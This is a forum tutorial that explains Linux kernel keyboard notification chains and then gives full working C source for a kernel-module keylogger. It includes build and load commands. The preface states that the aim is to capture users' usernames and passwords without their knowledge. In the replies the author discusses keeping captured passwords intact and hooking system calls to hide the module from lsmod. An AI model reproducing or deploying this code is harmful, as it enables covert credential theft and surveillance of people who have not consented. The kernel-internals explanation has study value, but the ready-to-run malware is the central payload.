Linux Keylogger and Notification Chains

#Preface
In this paper we will create a very basic Linux Keylogger. Keylogging is the action of recording every key pressed by the user on a keyboard. Typically this action happens without the user being aware of it, which gives the hacker the opportunity to catch usernames and/or passwords. Our keylogger will capture all printable-ASCII characters struck on the user keyboard.
For that, we will have to give a brief introduction on Linux Notification Chains. We will also be using Loadable Kernel Modules (LKM) and Device Drivers stuff.

Author Assigned Level: Wannabe

Community Assigned Level:

  • Newbie
  • Wannabe
  • Hacker
  • Wizard
  • Guru

0 voters

Required Skills

I will try to explain a little bit of everthing, but it is impossible for me to go deep on some topics, as they might be out of the scope for this paper. That’s why a little bit of knowledge in the following topics is recommended:

  • Linux OS basic stuff
  • Loadable Kernel Modules (LKM)
  • Character Device Drivers

Disclaimer

This paper is obviously for self-research purposes only, I don’t encourage the use of this material to do any harm, blah, blah blah


First things first: Linux Notification Chains

Before we start writing any code, we should have a general idea of what we are coding. Let’s first ask ourselves the interesting questions here: how does the OS keep track of everything that is typed in the keyword? In general, subsystems in the linux kernel are very independent, and events captured or generated by one of them might interest others. How do they communicate when an unexpected event happens?

The answer is using Notification Chains.

A notification chain is simply a list of functions that are called once an event happens. Subsystems can register themselves in any notification chain (created by other subsystems) by supplying a function pointer that will be called once an event happens. Using technical terms, we could say that there is the notifier subsystem and the notified subsystems. The notifier creates a list to which any other subsystem might register.

The main structure used in Notification Chains is notifier_block, listed below (linux/notifer.h):

struct notifier_block {
	notifier_fn_t notifier_call;
	struct notifier_block __rcu *next;
	int priority;
};

And here are its variables described:

  • notifier_call: This is a pointer to the callback function that will be called once an event happens.
  • next: the name Notification chain is self-explanatory. The notifier will have a chain of callback functions, which means that each notifier_block must point to the next one in order to call all registered functions. This next variable will point to the next notifier_block. It will be set automatically by the kernel.
  • priority: This will indicate the priority of the function. Functions with higher priorities will be executed first in the callback chain list. By default, the priority level is set to 0.

The notifier_call function declaration looks like this:

typedef	int (*notifier_fn_t)(struct notifier_block *nb, unsigned long action, void *data);

The meaning of each input parametrs is:

  • nb - The notifier_block currently being called.
  • action - A value indicating the type of event occurred.
  • data - A pointer that can be used to pass extra information about the event occurred.

Once the notified has initialized this struct, it needs to append it to the desired Notification Chain using the general function notifier_chain_register(struct notifier_block **list, struct notifier_block *n). The kernel also provides wrappers for this function, for example:

int register_inetaddr_notifier(struct notifier_block *nb); # Will add nb to the inetaddr notification list
int register_reboot_notifier(struct notifier_block *nb); # You can register to this Notification Chain if you want to be notified when there's going to be a System Reboot

These functions are wrappers that will call the general notifier_chain_register function with the correct chain list. The one we are interested in is (linux/keyboard.h):

int register_keyboard_notifier(struct notifier_block *nb);

But before we start getting our hands dirty, a couple more things about chain lists:

Notice how the register_XXX_notifier functions returns an int. The notifier expects a return value from each callback function. The value should be one of the following (extracted from the linux/notifier.h):

#define NOTIFY_DONE		0x0000		/* Don't care */
#define NOTIFY_OK		0x0001		/* Suits me */
#define NOTIFY_STOP_MASK	0x8000		/* Don't call further */
#define NOTIFY_BAD		(NOTIFY_STOP_MASK|0x0002)
						/* Bad/Veto action */
/*
 * Clean way to return from the notifier and stop further calls.
 */
#define NOTIFY_STOP		(NOTIFY_OK|NOTIFY_STOP_MASK)
  • NOTIFY_DONE - The notified subsystem is not interested in this event.

  • NOTIFY_OK - Notification was processed correctly.

  • NOTIFY_BAD - Something went wrong. Stop calling the callback routines for this event.

  • NOTIFY_STOP - Notification processed correctly, but no need to call further routines in the chain list.

  • NOTIFY_STOP_MASK is just a mask that is applied to NOTIFY_BAD and NOTIFY_STOP to stop further calls.

Also, last but not least, it’s important to mention that there also exists the unregister_XXX_notifier equivalent functions to unregister from a chain list.

Using the Keyboard Notification Chain

The Notification Chain we will be registering to is the Keyboard Notification Chain, and for that we will use the wrapper function register_keyboard_notifier. Before that, we will first need to create the notifier_block struct and the callback function. As a reminder, the callback function must look like this:

typedef	int (*notifier_fn_t)(struct notifier_block *nb, unsigned long action, void *data);

The data parameter

A couple of lines above I mentioned that the data parameter is used to pass extra information to the notified subsystem about the event occurred. The Keyboard Notification Chain uses this pointer to pass all data related to the KEY pressed. For that, it uses the following structure (linux/keyboard.h):

struct keyboard_notifier_param {
	struct vc_data *vc;	/* VC on which the keyboard press was done */
	int down;		/* Pressure of the key? */
	int shift;		/* Current shift mask */
	int ledstate;		/* Current led state */
	unsigned int value;	/* keycode, unicode value or keysym */
};

We will not use everything in this structure, only the down and value variables.

  • down - This variable can either be 0 or 1. If it is a 1 it means that the key has been pressed, a 0 means that the key has been released.
  • value - This variable will contain the actual data representation of the key pressed (i.e. 0x41 for A)

The action parameter

When describing the declaration of the callback function, I also mentioned that the action parameter describes the type of event. For the Keyboard Notification Chain, this value may be one of the following (linux/notifier.h):

/* Console keyboard events.
 * Note: KBD_KEYCODE is always sent before KBD_UNBOUND_KEYCODE, KBD_UNICODE and
 * KBD_KEYSYM. */
#define KBD_KEYCODE		0x0001 /* Keyboard keycode, called before any other */
#define KBD_UNBOUND_KEYCODE	0x0002 /* Keyboard keycode which is not bound to any other */
#define KBD_UNICODE		0x0003 /* Keyboard unicode */
#define KBD_KEYSYM		0x0004 /* Keyboard keysym */
#define KBD_POST_KEYSYM		0x0005 /* Called after keyboard keysym interpretation */
  • KBD_KEYCODE - this events are always sent before other events, holding the keycode
  • KBD_UNBOUND_KEYCODE - this events are sent if the keycode is not bound to a valid character
  • KBD_UNICODE - this events are sent if the translation from the keycode to a valid character produced a unicode character
  • KBD_KEYSYM - this events are sent if the translation from the keycode to a valid character produced a non-unicode character
  • KBD_POST_KEYSYM - this events are sent after the treatment of non-unicode keysyms.

Knowing this, we should only be interested in those notifications whose event type is KBD_KEYSYM as they will hold printable-ASCII characters data.

Getting Dirty: The steps to build our Linux Keylogger

Once all this theory has been absorbed, we can start coding our very first Linux Keylogger. For that, we will have to create a Loadable Kernel Module (LKM). There’re plenty of posts both in 0x00sec and Google that talk about LKMs and how to use them to create Device Drivers and RootKits, so a very brief introduction is more than enough.

Quoting from The Linux Kernel Module Programming Guide:

Another important thing to keep in mind is where do we want to put/save all the logged keys. When you are writing an LKM, it is not at all recommended to start opening and reading/writing files (Driving Me Nuts - Things You Never Should Do in the Kernel), that’s why we need to think of a different approach. For this example, I will create a Character Device that will keep track of all logged keys. This means we will have to implement the Device Driver in our LKM.

The functionality of the Keylogger is as follows:

  • We will hold all logged keys in a buffer.
  • We will create a Character Device Driver along with its character device file. Every time the device file is read, the buffer will be printed to the screen and it will be zeroed out.
  • We will register our LKM to the Keyboard Notificaton Chain using a notifier_block. For that we will have to create the callback function that will handle each keypress.

Here you have the code, well documented:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/keyboard.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <linux/notifier.h>

// Module Info
#define DEVICE_NAME "keylog0"  // The Device name for our Device Driver
static int major;  // The Major Number that will be assigned to our Device Driver

// Keylogger Info
#define BUFFER_LEN 1024
static char keys_buffer[BUFFER_LEN];  // This buffer will contain all the logged keys
static char *keys_bf_ptr = keys_buffer; 
// Our buffer will only be of size 1024. If the user typed more that 1024 valid characters, the keys_buf_ptr would overflow
int buf_pos = 0;  // buf_pos keeps track of the count of characters read to avoid overflows in kernel space

// Prototypes
static ssize_t dev_read(struct file *, char __user *, size_t, loff_t *); // Device Driver read prototype
static int keys_pressed(struct notifier_block *, unsigned long, void *); // Callback function for the Notification Chain

// Setting the Device Driver read function
static struct file_operations fops = {
	.read = dev_read
};

// Initializing the notifier_block
static struct notifier_block nb = {
	.notifier_call = keys_pressed
};


static int keys_pressed(struct notifier_block *nb, unsigned long action, void *data) {
	struct keyboard_notifier_param *param = data;
	
	// We are only interested in those notifications that have an event type of KBD_KEYSYM and the user is pressing down the key
	if (action == KBD_KEYSYM && param->down) {
		char c = param->value;
		
		// We will only log those key presses that actually represent an ASCII character. 
		if (c == 0x01) {
			*(keys_bf_ptr++) = 0x0a;
			buf_pos++;
		} else if (c >= 0x20 && c < 0x7f) {
			*(keys_bf_ptr++) = c;
			buf_pos++;
		}
		
		// Beware of buffer overflows in kernel space!! They can be catastrophic!
		if (buf_pos >= BUFFER_LEN) {
			buf_pos = 0;
			memset(keys_buffer, 0, BUFFER_LEN);
			keys_bf_ptr = keys_buffer;
		}
	}	
	return NOTIFY_OK; // We return NOTIFY_OK, as "Notification was processed correctly"
}

// Device driver read function
static ssize_t dev_read(struct file *fp, char __user *buf, size_t length, loff_t *offset) {
	int len = strlen(keys_buffer);
	int ret = copy_to_user(buf, keys_buffer, len);
	if (ret) {
		printk(KERN_INFO "Couldn't copy all data to user space\n");
		return ret;
	}
	memset(keys_buffer, 0, BUFFER_LEN); // Reset buffer after each read
	keys_bf_ptr = keys_buffer; // Reset buffer pointer
	return len;
}

static int __init keylog_init(void) {
	major = register_chrdev(0, DEVICE_NAME, &fops);
	if (major < 0) {
		printk(KERN_ALERT "keylog failed to register a major number\n");
		return major;
	}
	
	printk(KERN_INFO "Registered keylogger with major number %d", major);	
	
	register_keyboard_notifier(&nb);
	memset(keys_buffer, 0, BUFFER_LEN);
	return 0;
}

static void __exit keylog_exit(void) {
	unregister_chrdev(major, DEVICE_NAME);
	unregister_keyboard_notifier(&nb);
	printk(KERN_INFO "Keylogger unloaded\n");
}

module_init(keylog_init);
module_exit(keylog_exit);
MODULE_LICENSE("GPL");

You might have noticed that this snipped code doesn’t create the actual Device file. We can create it from the command-line once we know the Device Driver major number. First we need to compile and insmod the LKM to know the major number.

root@kali:~/keylogger# make
root@kali:~/keylogger# insmod keylogger.ko
root@kali:~/keylogger# tail -n1 /var/log/kernel.log
Dec  4 22:36:55 kali kernel: [41524.351867] Registered keylogger with major number 247
root@kali:~/keylogger# mknod keylog0 c 247 0 # Create the device as a 'c' character device, with 247 as major number and 0 as minor number

Once the device is created try entering a website or start writing a text document and after a few seconds, cat the keylog0 contents. You should see the results of your first linux Keylogger!

Conclusions

With this paper I hope that you got a pretty good understanding on how Linux communicates unexpected events between subsystems using the Notification Chains, and how you can use them in your LKMs! I even challenge you to create your own LKM that uses Notification Chains to do whatever you want on your linux machine!

I also hope that you had as much fun as I had while researching all this :slight_smile:

See you around,
~hasp0t

9 Likes

It’s awesome to see your first article @hasp0t! I really enjoyed reading through this. I do know however have some questions for you.

I see that you are only logging ASCII printable characters, and that is all dandy, as long as somebody is typing everything correctly, but what occurs when somebody presses the backspace, the tab, or the enter key? Is that logged too? I was under the impression that they are not ascii-printable, but are ascii-control characters.

Would it be a better approach to instead log KBD_KEYCODE, and then convert it to ASCII when you write to the file?

I am also very interested in how you have decided to create a device to log to.

Does this reduce the stealth of the module? Would there be anyway for me to discover this casually poking around the system?

Question: If we wipe the buffer in keys_pressed, are we potentially losing some data if it’s not written to the file in dev_read first?


Great tut. Enjoyed it a lot.

The keys pressed are identified in 3 different and consecutive levels:

  • Scancodes: The lower level. Is the raw data that the keyboard will send to the kernel. The kernel, depending on the keyboard layout configured, will convert this scancodes to keycodes.
  • Keycodes: Second level. This doesn’t represent any character. You can think of keycodes as functions. It’s not the same to press ‘c’ than ‘ctrl+c’. Both will be represented by different keycodes, so you can’t convert them to ascii that easily.
  • Keysyms: This is the highest level, which identifies the key pressed. Here, in both ‘c’ and ‘ctrl+c’ cases the value variable will be the same (‘c’). So, the kernel does the job of converting the Keycode to Keysym for you.

As I just wanted to create a simple Keylogger, I was happy with catching ctrl+c as a ‘c’ character. Further work should be done to identify those function keys.

Backspace is encoded as 0x7f in ascii. Notice how I filtered out this case when reading the KEYSYM received. Imagine the case where the user in one terminal writes a password, then opens another terminal and starts hitting the backspace, not deleting anything. If we didn’t filter the backspace key, the password written in the first terminal would be deleted in the Log. Again, this was a basic Keylogger, so for me it was fine if the user mistakenly wrote a password wrong as I would still be (possibly) able to get it.

Writing and reading files in the Kernel isn’t recommended at all. I’ve been working on Device Drivers for a couple weeks now, so I thought it would be a good practice to use a character device for the logged keys. The module won’t be stealthier, it will still be printed out when lsmoding or using cat /proc/modules. To create a stealth module you could maybe hook in the systems calls used when reading /proc/modules to filter out the output in the console. This might be a good practice too.

Hope this helped!

1 Like

You are right. If you don’t read the contents of the device file first and the user enters 1024 characters, the logged data will be lost. This example was used for demonstration purposes. Further work should be done in order to keep data without loosing any. Maybe dynamically allocate kernel memory once the buffer overflows? Another solution would be to create a user-space program that reads the contents of the device and writes them to a file. Then, from the module, notify the user-space program that the buffer has been or is about to be overflown, so that the user-space program clears the contents without loosing any data.

Hope this helped!

1 Like

If you are confused about character devices and major/minor numbers like I was after reading this, I found this helpful article: http://derekmolloy.ie/writing-a-linux-kernel-module-part-2-a-character-device

2 Likes

This topic was automatically closed after 30 days. New replies are no longer allowed.